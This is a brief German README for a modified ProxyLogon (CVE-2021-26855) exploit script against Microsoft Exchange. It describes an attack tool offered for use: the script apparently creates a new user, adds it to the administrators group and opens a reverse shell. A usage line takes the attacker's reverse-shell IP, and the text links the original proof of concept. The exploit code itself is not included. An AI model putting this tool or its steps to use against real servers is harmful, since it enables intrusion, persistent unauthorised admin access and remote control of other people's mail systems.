
Exploit für CVE-2021-26855 (ProxyLogon) gegen Microsoft Exchange. Erstellt einen neuen Admin-Benutzer und richtet eine Reverse-Shell für den Post-Exploitation-Zugriff ein.
CVE-2021-26855
Dies ist eine modifizierte Version eines Proof-of-Concept für proxylogon. Anstatt 'whoami' auszuführen, erstellt es einen neuen Benutzer, fügt diesen Benutzer der Administratorgruppe hinzu und erstellt eine Reverse Shell. Der ursprüngliche POC-Code ist hier zu finden: https://www.exploit-db.com/exploits/49663
Verwendung: python proxylogon.py <reverse_shell_ip>